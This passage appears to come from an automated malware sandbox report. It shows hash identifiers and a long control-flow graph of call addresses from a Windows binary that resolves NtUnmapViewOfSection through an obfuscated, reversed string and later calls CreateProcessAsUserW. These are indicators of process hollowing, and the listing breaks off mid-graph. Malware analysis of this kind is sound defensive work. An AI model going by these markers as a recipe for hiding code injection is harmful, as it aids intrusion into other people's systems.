                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProc$HandleModuleSectionUnmapView
                                                                                                                                • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                • API String ID: 858119152-2520021413
                                                                                                                                • Opcode ID: 6e958d86eeb5b257412e80125792bc0bff9bf938c4ccb7d7380cdde7581cec2d
                                                                                                                                • Instruction ID: a324242a2d3b9f671d079733f18900aec0bad20f260210700b8dee510ddc32f4
                                                                                                                                • Opcode Fuzzy Hash: 6e958d86eeb5b257412e80125792bc0bff9bf938c4ccb7d7380cdde7581cec2d
                                                                                                                                • Instruction Fuzzy Hash: 59F01275980204EFEB04EBA5EA509AEB7FAFF48740B908465A40497610DF38AE06DF14

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 2aaf7c8-2aaf7cb 1 2aaf7d0-2aaf7d5 0->1 1->1 2 2aaf7d7-2aaf808 call 2aa88b8 call 2a92ee0 call 2a92f08 call 2aa88b0 1->2 11 2aaf80a-2aaf819 call 2a94530 2->11 12 2aaf81b-2aaf825 call 2a94530 2->12 16 2aaf82a-2aafaed call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aaf6e8 11->16 12->16 117 2abb2ff 16->117 118 2aafaf3-2aafafa call 2aaf744 16->118 118->117 121 2aafb00-2ab0421 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aa8b14 call 2a949a0 call 2a946d4 call 2aae0f8 call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a947ec call 2a97e5c 118->121 394 2ab0427-2ab049e call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 121->394 395 2ab0534-2ab0647 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aae0f8 call 2a94530 121->395 423 2ab04a3-2ab052f call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94530 394->423 457 2ab064c-2ab0774 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a9c364 call 2a94530 395->457 423->457 490 2ab077b-2ab0b3c call 2a94a00 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aae0f8 call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a949a0 call 2a946d4 call 2a97e5c 457->490 491 2ab0776-2ab0779 457->491 602 2ab12fe-2ab18d6 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94de0 call 2aadd70 call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aae24c call 2a95818 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94530 * 2 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aae1d4 490->602 603 2ab0b42-2ab0f97 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94de0 call 2aadd70 call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aae24c call 2a95818 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94530 call 2aae1d4 490->603 491->490 857 2ab2ad8-2ab2cdb call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 602->857 988 2ab18dc-2ab1e0b call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a97acc call 2aaf16c call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aae24c call 2a95818 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 602->988 603->857 858 2ab0f9d-2ab12f4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a949a0 call 2a94d74 call 2aadd70 call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 603->858 1028 2ab2cdd-2ab2ce0 857->1028 1029 2ab2ce2-2ab2ce7 857->1029 1135 2ab12f9 858->1135 1340 2ab1e15-2ab202a call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aae4b8 988->1340 1028->1029 1029->117 1032 2ab2ced-2ab3246 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a97acc call 2aaf16c call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aaf108 call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94764 call 2aae24c call 2a95818 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 1029->1032 1379 2ab324b-2ab3564 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94530 * 10 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a949a0 call 2a946d4 1032->1379 1135->857 1462 2ab2030-2ab2139 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aaf00c 1340->1462 1463 2ab2ac5-2ab2ad2 1340->1463 1570 2ab356a call 2a97e80 1379->1570 1462->1463 1525 2ab213f-2ab28a3 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a9cdb0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aa6dc8 call 2aa2898 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a9e3fc call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a9e3fc call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a9e3fc call 2aa17e8 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 CoUninitialize call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 1462->1525 1463->857 1463->1340 2092 2ab28aa-2ab28af 1525->2092 2093 2ab28a5-2ab28a8 1525->2093 1572 2ab356f-2ab3571 1570->1572 1573 2ab370d-2ab3818 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 1572->1573 1574 2ab3577-2ab3708 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a949a0 call 2a946d4 call 2a98048 1572->1574 1661 2ab381a-2ab381d 1573->1661 1662 2ab381f-2ab3a37 call 2a94a00 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a948ec 1573->1662 1574->1573 1661->1662 1803 2ab3a3d-2ab3aa8 call 2a94860 call 2a949a0 call 2a946d4 call 2a97e5c 1662->1803 1804 2ab5530-2ab571b call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 1662->1804 1803->1804 1830 2ab3aae-2ab3e0a call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a936d0 call 2a92f08 call 2a97990 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a93700 1803->1830 1972 2ab5720-2ab5731 call 2aae398 1804->1972 1830->1804 1978 2ab5736-2ab57b1 call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 1972->1978 2019 2ab57b6-2ab57bd call 2aa89d0 1978->2019 2025 2ab57c2-2ab5843 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a97acc 2019->2025 2073 2ab5848-2ab5855 call 2aaf16c 2025->2073 2077 2ab585a-2ab58d5 call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 2073->2077 2112 2ab58da-2ab58e1 call 2aa89d0 2077->2112 2092->1463 2096 2ab28b5-2ab2ac0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aaf690 call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 2092->2096 2093->2092 2096->1463 2115 2ab58e6-2ab5a55 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 2112->2115 2199 2ab5a5a-2ab5a65 call 2aaf094 2115->2199 2204 2ab5a6a-2ab5af6 call 2aaf108 call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 2199->2204 2225 2ab5afb-2ab5b02 call 2aa89d0 2204->2225 2227 2ab5b07-2ab5d82 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a948ec 2225->2227 2300 2ab7568-2ab77e3 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a948ec 2227->2300 2301 2ab5d88-2ab5dcd call 2a94860 call 2a949a0 call 2a946d4 call 2a97e5c 2227->2301 2447 2ab77e9-2ab7e3b call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a947ec call 2a949a0 call 2aa85bc call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a949a0 call 2a946d4 call 2aaadf8 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a936d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 2300->2447 2448 2ab8318-2ab8517 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a948ec 2300->2448 2301->2300 2318 2ab5dd3-2ab66e5 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2aa85bc call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a948ec 2301->2318 3281 2ab66eb-2ab6944 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a94d74 call 2a94de0 call 2a94764 call 2aadc8c 2318->3281 3282 2ab6949-2ab706c call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a936d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a92f08 call 2a97990 call 2a947ec call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a92f08 call 2a97990 call 2a947ec call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a93700 2318->3282 3215 2ab7e3d-2ab7e40 2447->3215 3216 2ab7e42-2ab8104 call 2aa5aec call 2a94bcc call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a949f8 call 2aa7e50 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aab118 2447->3216 2623 2ab851d-2ab86f0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a947ec call 2a949a0 call 2a94d74 call 2a94df0 CreateProcessAsUserW 2448->2623 2624 2ab93a1-2ab9524 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a948ec 2448->2624 2835 2ab876e-2ab8879 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 2623->2835 2836 2ab86f2-2ab8769 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 2623->2836 2806 2ab952a-2ab9539 call 2a948ec 2624->2806 2807 2ab9cf5-2ab9d60 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 2624->2807 2806->2807 2818 2ab953f-2ab9812 call 2a94860 call 2a949a0 call 2a946d4 